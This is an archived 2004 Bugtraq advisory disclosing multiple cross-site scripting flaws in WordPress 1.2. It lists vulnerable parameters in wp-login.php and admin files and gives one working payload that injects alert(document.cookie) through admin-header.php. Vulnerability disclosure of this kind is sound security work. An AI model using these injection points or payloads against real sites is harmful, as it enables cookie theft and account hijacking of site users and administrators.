| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 27 Sep 2004 23:16:08 -0000 From: Thomas Waldegger <bugtraq@...ph3us.org> To: bugtraq@...urityfocus.com Subject: Multiple XSS Vulnerabilities in Wordpress 1.2 Vendor : Wordpress URL : http://wordpress.org/ Version : Wordpress 1.2 Risk : XSS Description: WordPress is a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability. [...] Go to http://wordpress.org/ for detailed information. Cross Site Scripting: wp-login.php: /wp-login.php?redirect_to=[XSS] /wp-login.php?mode=bookmarklet&text=[XSS] /wp-login.php?mode=bookmarklet&popupurl=[XSS] /wp-login.php?mode=bookmarklet&popuptitle=[XSS] Nearly every file in the administration panel of wordpress is vulnerable for XSS attacks. admin-header.php: /admin-header.php?redirect=1&redirect_url=%22;alert(document.cookie)// Nice bug. ;o) bookmarklet.php: /bookmarklet.php?popuptitle=[XSS] /bookmarklet.php?popupurl=[XSS] /bookmarklet.php?content=[XSS] /bookmarklet.php?post_title=[XSS] categories.php: /categories.php?action=edit&cat_ID=[XSS] edit.php: /edit.php?s=[XSS] edit-comments.php: /edit-comments.php?s=[XSS] /edit-comments.php?mode=[XSS] and so on ... Solution: There is not any solution yet. I contacted Matthew Mullenweg, one of the lead developers of wordpress, on Wednesday but I did not receive any answer until yet. Credits: Thomas Waldegger
Powered by blists - more mailing lists